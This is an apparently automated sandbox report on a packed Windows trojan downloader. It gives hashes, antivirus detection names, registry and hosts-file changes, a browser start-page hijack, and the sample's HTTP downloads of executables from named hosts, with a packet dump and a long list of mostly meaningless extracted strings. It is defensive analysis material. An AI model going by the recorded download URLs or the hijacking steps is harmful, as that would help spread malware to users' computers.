Analysis Date2014-10-14 02:16:55
MD5e7779b4afbbec65b34adc6523684691a
SHA1a95e78ead14f584fb2a5f714c4ddcb1e6034ac94

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionUPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
SectionUPX1 md5: 4e7fe04c92eac67dd35ae50789e91789 sha1: 90f4fd1a5aec9aafc2c097403e12049599adbb6a size: 216576
SectionUPX2 md5: e79cf2af70c05ab8da55615cd9a4e003 sha1: 4003a0be95a04b7d32cec546a11610d1180bf9b4 size: 1024
Timestamp2014-10-08 00:18:12
PackerUPX -> www.upx.sourceforge.net
PEhashf8d69f6537a890c5e7971b79f6a8097cb63fb7ef
IMPhash12949835d0cda9d5836fa2fbd6c55e3c
AV360 SafeGen:Variant.Symmi.42740
AVAd-AwareGen:Variant.Symmi.42740
AVAlwil (avast)no_virus
AVArcabit (arcavir)no_virus
AVAuthentiumno_virus
AVAvira (antivir)no_virus
AVBullGuardGen:Variant.Symmi.42740
AVCA (E-Trust Ino)Win32/Oflwr.A!crypt
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftGen:Variant.Symmi.42740
AVEset (nod32)Win32/Agent.WCF
AVFortinetno_virus
AVFrisk (f-prot)no_virus
AVF-SecureGen:Variant.Symmi.42740
AVGrisoft (avg)no_virus
AVIkarusno_virus
AVK7no_virus
AVKasperskyTrojan-Downloader.Win32.Generic:Trojan.Win32.Hosts2.gen
AVMalwareBytesno_virus
AVMcafeeno_virus
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Gen:Variant.Symmi.42740
AVNormanwin32:win32/SB/Malware
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus
AVYara APTno_virus
AVZillya!no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page ➝
http://www.2345.com/?k98792151\\x00
RegistryHKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue ➝
NULL
Creates FileC:\Program Files\Common Files\appers_7_1958.exe
Creates FileC:\WINDOWS\system32\drivers\etc\hosts
Creates FileC:\Program Files\Common Files\asdqw_3104-48740.JPG
Creates FileC:\WINDOWS\system32\unrar.dll
Winsock URLhttp://cdn.pcbeta.attachment.inimc.com/data/attachment/forum/201409/12/173937imav9yvcycn3akua.jpg
Winsock URLhttp://down.9vh.net/appers_7_1958.exe
Winsock URLhttp://down.tianyunxj.com/tqrl_97_1957.exe

Network Details:

DNSwebmirror.pcbeta.com
Type: A
113.107.42.25
DNSdown.9vh.net
Type: A
222.186.60.3
DNSc06.i06.arnic.hadns.net
Type: A
116.11.254.249
DNSc06.i06.arnic.hadns.net
Type: A
183.57.148.246
DNScdn.pcbeta.attachment.inimc.com
Type: A
DNSdown.tianyunxj.com
Type: A
HTTP GEThttp://cdn.pcbeta.attachment.inimc.com/data/attachment/forum/201409/12/173937imav9yvcycn3akua.jpg
User-Agent:
HTTP GEThttp://down.9vh.net/appers_7_1958.exe
User-Agent:
HTTP GEThttp://down.tianyunxj.com/tqrl_97_1957.exe
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 113.107.42.25:80
Flows TCP192.168.1.1:1032 ➝ 222.186.60.3:80
Flows TCP192.168.1.1:1033 ➝ 116.11.254.249:80

Raw Pcap
0x00000000 (00000)   47455420 2f646174 612f6174 74616368   GET /data/attach
0x00000010 (00016)   6d656e74 2f666f72 756d2f32 30313430   ment/forum/20140
0x00000020 (00032)   392f3132 2f313733 39333769 6d617639   9/12/173937imav9
0x00000030 (00048)   79766379 636e3361 6b75612e 6a706720   yvcycn3akua.jpg 
0x00000040 (00064)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000050 (00080)   63646e2e 70636265 74612e61 74746163   cdn.pcbeta.attac
0x00000060 (00096)   686d656e 742e696e 696d632e 636f6d0d   hment.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f617070 6572735f 375f3139   GET /appers_7_19
0x00000010 (00016)   35382e65 78652048 5454502f 312e310d   58.exe HTTP/1.1.
0x00000020 (00032)   0a486f73 743a2064 6f776e2e 3976682e   .Host: down.9vh.
0x00000030 (00048)   6e65740d 0a436163 68652d43 6f6e7472   net..Cache-Contr
0x00000040 (00064)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000050 (00080)   63646e2e 70636265 74612e61 74746163   cdn.pcbeta.attac
0x00000060 (00096)   686d656e 742e696e 696d632e 636f6d0d   hment.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....

0x00000000 (00000)   47455420 2f747172 6c5f3937 5f313935   GET /tqrl_97_195
0x00000010 (00016)   372e6578 65204854 54502f31 2e310d0a   7.exe HTTP/1.1..
0x00000020 (00032)   486f7374 3a20646f 776e2e74 69616e79   Host: down.tiany
0x00000030 (00048)   756e786a 2e636f6d 0d0a4361 6368652d   unxj.com..Cache-
0x00000040 (00064)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000050 (00080)   650d0a0d 0a636265 74612e61 74746163   e....cbeta.attac
0x00000060 (00096)   686d656e 742e696e 696d632e 636f6d0d   hment.inimc.com.
0x00000070 (00112)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000080 (00128)   6e6f2d63 61636865 0d0a0d0a            no-cache....


Strings
y
.
9.
m4
.V
.00
Ln
...
..v.
$.
.,.V.9
.K
;
g
.
.
{.}'.
.
..
%U
.A
b
.
.^
>
.
u
y
.
9.
m4
.V
.00
Ln
...
..v.
$.
.,.V.9
.K
;
g
.
.
{.}'.
.
..
%U
.A
b
.
.^
>
.
u
<!/'#_
>	>">.
 !"#$%&'()*+,-
{,<< ;
0 0&0,02
010:0G0S0g0m0
03V4T7~
=0>55Zk
&%070K0_R
@0808C
 (08@P`p
**.0b2
	 0@eh
0^K:.<
0W5$v!
;1;?;{;
1 1$1(1,
1%1B1U1^1
>1.76H
1c8g8k8o8s8w8{8
|1et7f
<*>1>j>q
(1p^xN?
1q2	2C2
1#QNAN
1r1v1z1~1
:1|.r&c
1RP-t,&
 1xmlns="
2| @ ~
219.235
2(252;2O2
227562
2"2+r	
24_mt1CYf3
?"?&?*?.?2?6?:
2>JZfx<
-3|00T
3<048<
31o0a2`
32@3L3X
32\taskmgr.exe
3$3(3H
:'.35@.
35138b9a-5d9fbd-8
:(>->3>8>Y>[
3c5W7J
3LTP8o
3#]LwD
'3tb_~23!
=3&ufD
"	3Y\.
<4\4`4d
4463<tU `
456789abcdef
46-4 -a5
465p5X7
4,84(D!
48crSLF
48`}<j
4;BA@845ZL
4,d*C_
4\<`<d<h
4~f9.u
>4LEJh
4R:|0mI/
4s+^,(8	7
4wB6!H
)4{;Zr
50o0y0
517xky.we
538f494a2afdb0c
"57-15
5eqYCr
5\Ga=0
.5{ika
5OqNC4
5S"m[E9
/5t"bu
5tJ&RG
	5YfF-.|p
\\(6@"
<602..g-
60[awbw
6@@+3;
647X7`
6!6(6/6N6U6\6c6
6,686<
6"7-7Q6
6.cB:)
6J?	fQH+
6k>o>s
 6Lbx<
6NDh&%X
<6N@nG
6Q617]7
6r$,&80
6TJC%}
6v@%'h
6	*y9t
<6Z2ea7be1o
!6z")n
7$:(:,
73937Zav9yvcycn3aku
77>7E7L
7"818;9X9
7=f;*Y.
7J-%$J
7K8\8j8
7UQPXY]_
7V;,0,27Bsl
8002*<>|"
8273I3
83`$	Q
@<840(>
84l2c4511da95:8642Q
8]6SV&
8"8(8.84
>88@jP{
8`@8Vf
]8.9|9
8"C4BEh
<8C8J8Q8X8_8f8
\.8<@D.
(8l@03
8NA,E!
\?8=O~
8`t4=Ft
#8UP*$JBOWXQlEO
^8uWu5s%
8VWa~X
`8Z8d8
900FB7
92.e:$:
942q71fFy
959@9y9
^}%95PIb~
9,~89B
98:T:\:d:u:
9(fdvlt
)9Fxh8$
9GH&	,
9`:i:r:~:
9J:n:t:z:
)9StpA
,$\9?x
?~]9x9
_9~X~B
9Y:2D5
9y`8;qdt
A0/?k9879215
$a'']+4
*A7_[pG>
AA2L"k.
.//:;<=>?@ABCDE
@ACL@TM
*ad(NX
ADVAPI32.dll
ad	wVJ
aEPK*h
<afnwQ
~_AFX_
aLrr}C
A<\m u
and Object
AN~-t/
(apX3w
aqtn,CO 
ATL.DLL
.?AVqm
!A'WCl
a!xijklm
*AxW`X
A[Y+=4
}Ay@K#
}b1Free3pv5l
>B>_2.
B6T}B.S
B7|CfT\
::bad_
BASES-Q
bB=A}\
}BbP*l
bbsWjajF<
**BCCx
{Bc*m>r[sK6ly
%`@bCryptKeyCacheI
>BEFGJQ<(=~
?B?F?J?N?R?V?Z?^?b?f?j?n?r?v?z
Bg}B9(
BitBlt
BJ m.G
:B>n9<f
|#b(}O
bR@<@u
^Bs4vE
b{%t[3Y
BT=	q]\
Buff#Uppw
@B.vTE(
BWideC
B	wR`Z
%<BZ$=Yv
CAfxOldhProc423'
cAn!EH
@&C)B:txCF
ccOe@.
	`,Cdt
<char>
clB127.0
ClosePrinter
 (/clr)M
CmdTar*t
COMCTL32.dll
CONOUc
CoUV[i
c^P	'~
c)?pOT
cp@pWh 
CPPZbugHook
Cqi7gq
cripth.
ctorgk
curityP
CWinApp
D0J0P0V0\B
*d 0N@
^.D2qs
D3xB#a-
]D;79j
D7m7y7
D9_Pt?&
DBu.hX3
dc71cb6o
Dc?THREAD
d D\%'"
DD~!g8-U
? DefaultI0nE
~d\Fold
.D<G:FP
\\`dh\.
>>+DHr
&D~j2H
_D!LX4
DnE"yP0
	?^dO"
:D}O`,[
dqw_3104-4
DragFinish
:dtZ6(
DWORD4
dXL6"y
dXP^D@<y
)dxu2ZB
E4SCQD
E7IV3<AQ
E<$'-A
EAP_SEL
]..EbuB'
{E^cHi
Edit Tex
))EE	F
%|E?f;
;`eh %
e@-K=6
E<`l9A[
Elehmd
~em$qqri
e#nrO-uI
EnumDisplay/Lk
@eQQPC
Es<p4!
E|SYo|C
euoGetM i
ExitProcess
F0RYx.s
f1D?y_
F|.4E*
f>?77=
f`7>fal
f7j7w7
@FBC(|5
@.f@C|
F-fR_u|
FGEsS8T
FGPYYa
?'fg?t
F]ht_Y
@Fh@:w
FKl\3H
f,l\ )
F:^,LI
FO{FD@
/Format
f,:pvp
;fr?=Q2
	'<FSAU
fstVkvAw
-Fvl#PL-(;=4t
' f*x.
FY	1E`
fY#i(I
fzhWfv
!g(~=7
,G94952`]ST
GcOxOnpF8
GDI32.dll
GetProcAddress
gH i$ 
g:HTTP+
g]lBMg
_GLOBAL_Hw
'G@N`]w
-?gWWWJ
<G;||y
	?-G{,Y
h595b64144ccf1dfBl
~H5h5t5
>(@H$6
h6l Dlg
h7xfui
#h~%am
>h`b?ku
$Hbmzd
HDA&{C
hDJ&aM
HgOHZu"
H]@H.6
/h%HDko
HiC{.mijr
H"J;${6S1
HKEY_LOC
h%kmjh{
"(>H>L>l>p>
	hl-sms=
ho&B&V
h.`rkE
?(?H?T?X?h?
Hu)19j
I*@!0Af,l
i4h88V
i6xCL*.DLL
%I7uj=cP
ibly.ie
I &(C3
IF.G,,,
i&FH/^
i_H<VE
IJKLMNO
>_I:l 
ileNameW
INSZdl<
InternetOpenA
i~<r_J
 @ise,
IS_I5Qt0S
IT8#gu
).iU2A
ivOMA$#R6028
{Iw:=0
IXxdaE
J.5P*vZP
?J;7uT
japoO|
JcG 6lQ
J,{]&d
jEEE) *
jf,;;A
_jg04Ou\F483lZatm6IP
;j`h8N
j\HZ,$%
jKOhE"
jmx#i-
^J@][N	
jO57OOou
=JO%`G.
jPzJt]`
jS>Vs~
'juHaYd*
ju!QcX
jV%X^2
 JyO$|
-<=<J<z<
*jZ2Gi
($K( &
K C2P_O
k,CbW4U
kCH}b^)9
]K%E"+
;\@KERN8
KERNEL32.DLL
kH;er 8^D
KhG-Ac[u
KO78h2P
;k=o=s=w
;kp7qO|E"
 k?PuFF
kQE?@-j
k Source D
kWwktZ
`'L"` 
l4\P=s.
?,(-laa
l{A(+i
LASSES_ROOT
 L?A#YP<
LBnew_9p[
"#ld*fN
/LfarV
\lh/8x
lhd`\X<
`(`;l&I
lj0@P]v
LJJ!M&
l^_lcl
LoadLibraryA
> l#v$
L\vJb\0
lX|A/nN]
,<L<X<x<
l.yi85
}%M `]
>m0`qj1`
M0s041<1
M,3g\%=
"M3X_z7
m4}5 DS
mA8~+@
MACHjE\SOFTWAR
"$max,U
mbA91kd0
MEfd{g
?-mEpg8l7
mGH4_Tex
..mi7D
MiscSt
,m lu 
=MODULE_
&m|rl_DZgL
Msug@wu
m!%ts+
 m.v1"z
]N,a6^
\nbwnX
n,C4Q4a4p4
NcS9X])d
{n'Frre3V
NH-6>Y
/NH9NvZz9f9l9|
nKh0(X~N
NNCPgR/S
,.NNnk
(n}ob#
No such.
NotSupp
Np*H{o
>N$R8Nd??
nsoftw
]nt>j,
n _vec=v
~O4n4v4
o#Bv%2
od1.0">
OdN52^
oegU"H
oJ\h$K
ole32.dll
OLEAUT32.dll
oledlg.dll
OLEPRO
OleRun
OlgI`:s1x
O.mpGpM 
omPoizo'7b
`oNG_NO&
Oo!+Bt
oOlt!c573r
opyright 
!orRYD
Ou5h=;
oUC++ RALi
OU]Sh,_H
o"u>Vj
{P!,2X
p{4L2U
P[5A#d`
P6 wGd`
P7Xpu1*
p9	o`Q-
p <'a(
"#p[;'A"
PADVAPIx
P`AmRhbBA
PathMatchSpecA
PBL"Po7
[Pb$RP3
|pdXL<
~p,gow
piW0gSs
`/@PJ.
pkcWMG
pK\w1SXX-A
*< Pl\
Poa3Eh!
>PPADD
p*p@guo5
p(Q(Sw
\!	&Pr
PRiItm
`PU@|0,
Pu&gnQ	%
+p@u	T
Pv`Q`5Y
P'XA!P;
pZp~d2t
QAuto=1
QD49Yw
qFbAlX
!QFWa:d
QGD"1BS
*QjV*C0
Q>KtL>@
\@QlR %
qoAMSKJW
qp:hHAH
qptfV?_
`qsd.k
  qui*
qu*Th{
Qu,UPi;
Q --wj-la
r$(,04r
 R_0X.
r5_vl..1
R7%w.J#
{r8<>.=	
RA1Ffg1w1
r\Advb
*Rais#z
rdi2b.c: 
RegFlushKey
r&Et`%g
rfL2g[C
? @(RG
R_h O*
rI/OB}
rkE@$@
rkv_{l&
R@l/+3(
RM8ui@
r%'MDIFr
rnetlt
Rp/Ws&BC!x
RPyHSy
:'RQ]k
/ rr!'
rri000K3D
r"^(r Z
rs\etc\ho(s)
rXt;:m
RyUh:PGtk&
RzDoD4t
S3Y3d3p3
S:4oBj'
S=8p]K[Gl)
Saf1Dhk
S )Augus
SB`>H^
:sch&0-m=
S@Dt9f
s	 E]ov
sE[YD%
s_g@;	"
sGiQIYI\QiyiI,
S_g	S2L
sgwdnI13
shadu007
SHELL32.dll
shlw47D
SHLWAPI.dll
si!9, %8^
SIMULATE_TLS: 
SIV,,>
#&}sjxun9
skQ_7_1958
;Sl\C$
sO;>|C;
SPkLYIu
<[SQf9
	}s)t&
stK?OMN
SV1)ik01
S-X< f?
}+*`SXU
$s/z \
s_ZDWQ
T2X2h2x2
t44 ,;
t4&.A8
@]%T4}X
T6zVhDJP
t8-WWwSH
"t^9(uZ
TBQkEx
$])TD`
T^&d%er
"'tDM5.
.te_oB
tfk('T
!This program cannot be run in DOS mode.
Th$s'7
Th spa
tiH' V&
#Tj _f
*,*T(K
~T$*L$
(tmc'$VP9
TofRr#32
<TPLHD
t(?pyA
|tqrl1M_9
}~t$R)
t*SWpx0X
T*,TL4N
ttp://
;T$X]}_
T#y/76
T)=ZU$
t=ZVP	
u0E0xKeh
uA ( HH
\??\!uc
udxvq&
Uf%F`=
ui$<5a
)uk0	O$
ungpl|n
unxj{U8
UOffHA
?Upbe%
$	 UPdR,l
$upValue
	"UQ.2i,9
?Us6Ex
USBC]#
USER32
USER32.dll
uU8uQs
uV~6hR+
uvwxyz
uwu@Sy28L
u)xf"0o
V/.2r{
v7^AsW
@v8iv!
]*VA,@
>v	A`dH
VC20XC00
vd6WJO!
_v=d}Lj
VE9&_0
VERROR
VF0:`?
V{H$OI
viewPages
VirtualAlloc
VirtualFree
VirtualProtect
 V+Iy`
Vj(@X<i
VL,/d&k
vObbfp
\\v]Po
V#[Q$S@
,&[vrH
VrH<<'
VSPLAY
>VUSWY
 VX4)W
@W0122r2*23
Wait@2
was about
(w@D,!@
WDOCU(
$\&wFC
w"F$WRv
wgFk?s
WH^%SM
WININET.dll
WINSPOOL.DRV
wIXIp+$
	WjEa)
W	j	XO
wLVSPm
|w"NV9
 w	o%S
.wphi8
~&WPwF
 w{r1}
WSNi2>
]w.T'H
)WTK0s(VS9
w/wu,v
Wx#6Bv
wY{58&(hVbv)
X`?{|}
X$\0t	
X8t;,o^
x&^bP\n
+Xb	+V
xCbFt+
)X/'D5
xGdX%t
xhSG8j
xiGtt4e
,XKtU?
Xk/'X`
 <Xm1[
x ^N._
X,@N_|A
XPTPSW
@xt&Box
Xt+DPI
x+u!xO0
~x |Wz
XYZ[\O
:Y0*+K
Y[4R[|
y840,(
.._Y?FA?	
`YFW }
.Y[[h]u_
yI}ciI/m'@6X
YK<=l;,
YM0]W#8	&
(yp8OXAn
yp-@_S
{<:y&q?	
YSTEM6
+&#@YtR;
YTXLHXV
Y`V8	+
Y_V_#Pa
 +Y.Xhz|m
;\YYyX
/< }z"
_z1YY4P.
z64lbt4xk&<4
 ;,ZIac
ZKTm#\
ZlGL@:S
zLyk`'
^][_Zm
Z[!(m~
ZmmitH
"?[ZQZPG
ZR9g9%
#[ZxJu
Zz@a]1(